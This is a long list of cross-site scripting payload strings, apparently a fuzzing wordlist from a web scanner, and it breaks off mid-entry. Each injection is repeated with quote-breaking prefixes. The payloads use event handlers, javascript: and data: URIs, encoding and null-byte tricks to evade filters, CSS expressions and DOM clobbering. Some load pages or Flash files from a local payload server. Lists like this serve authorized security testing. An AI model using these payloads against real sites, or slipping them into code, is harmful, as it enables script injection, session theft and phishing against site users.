'<input/autofocus/onfocus=alert(1)>', '"><input/autofocus/onfocus=alert(1)>', "'><input/autofocus/onfocus=alert(1)>", '</script><svg><script>alert(1)+"', '"></script><svg><script>alert(1)+"', "'></script><svg><script>alert(1)+"", '<script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)>", '<marquee/onstart=alert(1)>', '"><marquee/onstart=alert(1)>', 
"'><marquee/onstart=alert(1)>", '<video/poster/onerror=alert(1)>', '"><video/poster/onerror=alert(1)>', "'><video/poster/onerror=alert(1)>", '<isindex/autofocus/onfocus=alert(1)>', '"><isindex/autofocus/onfocus=alert(1)>', "'><isindex/autofocus/onfocus=alert(1)>", '<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '"><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '\'><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '<iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '"><iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '\'><iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '\';alert(String.fromCharCode(88,83,83))//\';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>', '">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><img src="http: //i.imgur.com/P8mL8.jpg?>', '" onclick=alert(1)//<button ? 
onclick=alert(1)//> */ alert(1)//', 'javascript:confirm(1)', 'javascript:confirm(1);', 'javascript:alert(1)', 'javascript:alert(1);', 'avascript:alert(1)', 'javaSCRIPT:alert(1)', 'JaVaScRipT:alert(1)', 'javas	cript:\\u0061lert(1);', 'javascript:\\u0061lert(1)', 'javascript:alert(1)', 'javascript:alert(1)', 'javascript:alert(1)', 'javAscRipt:alert(1)', 'javAscRipt:alert(1)', 'vbscript:alert(1);', 'vbscript:alert(1);', 'vbscr	ipt:alert(1)"', '<iframesrc="javascript:alert(2)">', '"><iframesrc="javascript:alert(2)">', '\'><iframesrc="javascript:alert(2)">', '<iframe/src="data:text/html;	base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text/html;	base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text/html;	base64
,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<isindexformaction="javascript:alert(1)" type=image>', '"><isindexformaction="javascript:alert(1)" type=image>', '\'><isindexformaction="javascript:alert(1)" type=image>', '<input type="image" formaction=JaVaScript:alert(0)>', '"><input type="image" formaction=JaVaScript:alert(0)>', '\'><input type="image" formaction=JaVaScript:alert(0)>', '<form><button formaction=javascript:alert(1)>CLICKME', '"><form><button formaction=javascript:alert(1)>CLICKME', "'><form><button formaction=javascript:alert(1)>CLICKME", '<form action="Javascript:alert(1)"><input type=submit>', '"><form action="Javascript:alert(1)"><input type=submit>', '\'><form action="Javascript:alert(1)"><input type=submit>', '<isindex action="javascript:alert(1)" type=image>', '"><isindex action="javascript:alert(1)" type=image>', '\'><isindex action="javascript:alert(1)" type=image>', '<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>', '"><isindex action=j	a	vas	c	r	ipt:alert(1) type=image>', "'><isindex action=j	a	vas	c	r	ipt:alert(1) type=image>", '<isindex action=data:text/html, type=image>', '"><isindex action=data:text/html, type=image>', "'><isindex action=data:text/html, type=image>", '?/><marquee onfinish=confirm(1)>a</marquee>', '<object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '"><object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '\'><object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '<img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', '"><img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', '\'><img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', "<script>alert('X')</script>=a", "</ScrIpt><script>alert('X')</script>=a", '"><script>alert(\'X\')</script>=a', "</ScrIpt><script>alert('X')</script>=a", "'><script>alert('X')</script>=a", "</ScrIpt><script>alert('X')</script>=a", 
'<script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '"><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '\'><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '\';!--"<XSS><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>={()}', '<script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '"><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input 
name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '\'><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', 'asfunction:getURL,javascript:alert(1)//', '\\%22))}catch(e){}if(!self.a)self.a=!alert(1)//', '"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//', '0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//', '<button/onclick=alert(1) >X</button>', '"><button/onclick=alert(1) >X</button>', "'><button/onclick=alert(1) >X</button>", '<a onmouseover=(alert(1))>X</a>', '"><a onmouseover=(alert(1))>X</a>', "'><a onmouseover=(alert(1))>X</a>", '<p/onmouseover=javascript:alert(1); >X</p>', '"><p/onmouseover=javascript:alert(1); >X</p>', "'><p/onmouseover=javascript:alert(1); >X</p>", '<article xmlns="><img src=x onerror=alert(1)"></article>', '"><article xmlns="><img src=x onerror=alert(1)"></article>', '\'><article xmlns="><img src=x onerror=alert(1)"></article>', '<article xmlns="x:img src=x onerror=alert(1) ">', '"><article xmlns="x:img src=x onerror=alert(1) ">', '\'><article xmlns="x:img src=x onerror=alert(1) ">', '<p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '"><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '\'><p 
style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '<listing><img src=x onerror=alert(1)></listing>', '"><listing><img src=x onerror=alert(1)></listing>', "'><listing><img src=x onerror=alert(1)></listing>", '"onmouseover=alert(1);a="', "'+alert(1)&&null=='", "+alert(1)&&null=='", "\\\\\\'><script>1<\\\\/script>", "\\\\\\'><body onload=\\\\\\'1\\\\\\'>", '\\"><script>1<\\\\/script>', '><script>1<\\\\/script>', '\\"><body onload=\\"1\\">', '<img src=\\"x:X\\" onerror=\\"alert(1)\\">', '"><img src=\\"x:X\\" onerror=\\"alert(1)\\">', '\'><img src=\\"x:X\\" onerror=\\"alert(1)\\">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1)", "<script>alert(\\'1\\')</script>", "</ScrIpt><script>alert(\\'1\\')</script>", '"><script>alert(\\\'1\\\')</script>', "</ScrIpt><script>alert(\\'1\\')</script>", "'><script>alert(\\'1\\')</script>", "</ScrIpt><script>alert(\\'1\\')</script>", "<script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", '"><script>alert(\\\'\\\\\\\\1\\\\\\\\\\\')</script>', "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "'><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "<script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", '"><script>alert(\\\'\\\\/\\\\1\\\\/\\\\\\\')</script>', "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "'><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", '\\\'\\\'\\">', '<scri%00pt>alert(1);</scri%00pt>', '"><scri%00pt>alert(1);</scri%00pt>', "'><scri%00pt>alert(1);</scri%00pt>", '<scri\\x00pt>alert(1);</scri%00pt>', '"><scri\\x00pt>alert(1);</scri%00pt>', "'><scri\\x00pt>alert(1);</scri%00pt>", '<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>', '"><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>', 
"'><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>", '<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '<%0ascript>alert(1);</script>', '"><%0ascript>alert(1);</script>', "'><%0ascript>alert(1);</script>", '<%0bscript>alert(1);</script>', '"><%0bscript>alert(1);</script>', "'><%0bscript>alert(1);</script>", '<SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '"><SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '\'><SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '<SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '"><SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '\'><SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '<script>alert([!![]] [])</script>', '</ScrIpt><script>alert([!![]] [])</script>', '"><script>alert([!![]] [])</script>', '</ScrIpt><script>alert([!![]] [])</script>', "'><script>alert([!![]] [])</script>", '</ScrIpt><script>alert([!![]] [])</script>', '<var onmouseover="prompt(1)">X</var>', '"><var onmouseover="prompt(1)">X</var>', '\'><var onmouseover="prompt(1)">X</var>', '%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80?', '<input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '"><input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '\'><input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?', '"><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?', "'><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?", '<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>', '"><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>', "'><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>", '<meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript:alert(1)"/>?', '"><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript:alert(1)"/>?', '\'><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript:alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript:alert(1)"/>?', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '"><script>~\'\\u0061\' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~\'\\u0061\')</script U+', "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. 
\\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "'><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '<script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script ????????????", '"><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script ????????????", "'><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script", '"><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data:text/j\\u0061v\\u0061script,\\u0061%6C%65%72%74(/X/)></script ????????????", '<script itworksinallbrowsers>/*<script* */alert(1)</script', '"><script itworksinallbrowsers>/*<script* */alert(1)</script', "'><script itworksinallbrowsers>/*<script* */alert(1)</script ?", '"><script itworksinallbrowsers>/*<script* */alert(1)</script ?', "'><script itworksinallbrowsers>/*<script* */alert(1)</script ?", '<img src ?itworksonchrome?\\/onerror = alert(1)', '"><img src ?itworksonchrome?\\/onerror = alert(1)', "'><img src ?itworksonchrome?\\/onerror = alert(1)???", '"><img src ?itworksonchrome?\\/onerror = alert(1)???', "'><img src ?itworksonchrome?\\/onerror = alert(1)???", '<meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>">', '"><meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>">', '\'><meta http-equiv="refresh" content="0; 
url=data:text/html;blabla,<script>alert(1)</script>">', '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe", '<script/src=data:text/javascript,alert(1)></script>', '"><script/src=data:text/javascript,alert(1)></script>', "'><script/src=data:text/javascript,alert(1)></script> ?", '"><script/src=data:text/javascript,alert(1)></script>', '"><script/src=data:text/javascript,alert(1)></script>', "'><script/src=data:text/javascript,alert(1)></script> ?", "'><script/src=data:text/javascript,alert(1)></script>", '"><script/src=data:text/javascript,alert(1)></script>', "'><script/src=data:text/javascript,alert(1)></script> ?", '<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '"><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '\'><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?', '<img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '"><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '\'><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html"\');>', '<table background=javascript:alert(1)></table>', '"><table background=javascript:alert(1)></table>', "'><table background=javascript:alert(1)></table>", '<object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf', '"><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf', "'><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf", '<applet code="javascript:confirm(1);">', '"><applet code="javascript:confirm(1);">', '\'><applet 
code="javascript:confirm(1);">', '<marquee/onstart=confirm(2)>/', '"><marquee/onstart=confirm(2)>/', "'><marquee/onstart=confirm(2)>/", '<body onload=prompt(1);>', '"><body onload=prompt(1);>', "'><body onload=prompt(1);>", '<select autofocus onfocus=alert(1)>', '"><select autofocus onfocus=alert(1)>', "'><select autofocus onfocus=alert(1)>", '<textarea autofocus onfocus=alert(1)>', '"><textarea autofocus onfocus=alert(1)>', "'><textarea autofocus onfocus=alert(1)>", '<keygen autofocus onfocus=alert(1)>', '"><keygen autofocus onfocus=alert(1)>', "'><keygen autofocus onfocus=alert(1)>", '<video><source onerror="javascript:alert(1)">', '"><video><source onerror="javascript:alert(1)">', '\'><video><source onerror="javascript:alert(1)">', '<a onmouseover="javascript:window.onerror=alert;throw 1>', '"><a onmouseover="javascript:window.onerror=alert;throw 1>', '\'><a onmouseover="javascript:window.onerror=alert;throw 1>', '<img src=x onerror="javascript:window.onerror=alert;throw 1">', '"><img src=x onerror="javascript:window.onerror=alert;throw 1">', '\'><img src=x onerror="javascript:window.onerror=alert;throw 1">', "<body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';", '"><body/onload=javascript:window.onerror=eval;throw\'=alert\\x281\\x29\';', "'><body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';", '<img style="xss:expression(alert(1))">', '"><img style="xss:expression(alert(1))">', '\'><img style="xss:expression(alert(1))">', '<div style="color:rgb(\'\'�x:expression(alert(1))"></div>', '"><div style="color:rgb(\'\'�x:expression(alert(1))"></div>', '\'><div style="color:rgb(\'\'�x:expression(alert(1))"></div>', '<a onmouseover=location=?javascript:alert(1)>click', '"><a onmouseover=location=?javascript:alert(1)>click', "'><a onmouseover=location=?javascript:alert(1)>click", '<body onfocus="location=\'javascrpt:alert(1) >123', '"><body onfocus="location=\'javascrpt:alert(1) >123', '\'><body onfocus="location=\'javascrpt:alert(1) 
>123', '<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '\'><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>', '<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '"><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '\'><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>', '<meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '"><meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '\'><meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>', '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg>', '<style>#test{x:expression(alert(/X/))}</style>', '"><style>#test{x:expression(alert(/X/))}</style>', "'><style>#test{x:expression(alert(/X/))}</style>", '<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?", '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?", '<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', '"><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', '\'><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">', 'eval("s=document.createElement(\'script\');alert(1);document.getElementsByTagName(\'head\')[0].appendChild(s)")', '<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\'><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\'><meta http-equiv="refresh" 
content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', '\'><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">', 'javascript:/*?></marquee></script></title></textarea></noscript></style></xmp>?> [img=1]<img -/style=-=expression(/*?/-/*\',/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>?"/>', '<img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>', '"><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>', "'><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>", '<input id=x><input id=x><script>alert(x)</script>', '"><input id=x><input id=x><script>alert(x)</script>', "'><input id=x><input id=x><script>alert(x)</script>", '<a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '"><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '\'><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>', '<script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '"><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', "'><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>", '</ScrIpt><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>', '<a href=1 name=x>test</a><a href=1 
name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>', '"><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>', "'><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>", '<a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '"><a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '\'><a href="123" id=x>test</a><script>x=\'javascript:alert(1)\';</script>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '"><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '<form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '"><form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>', '\'><form 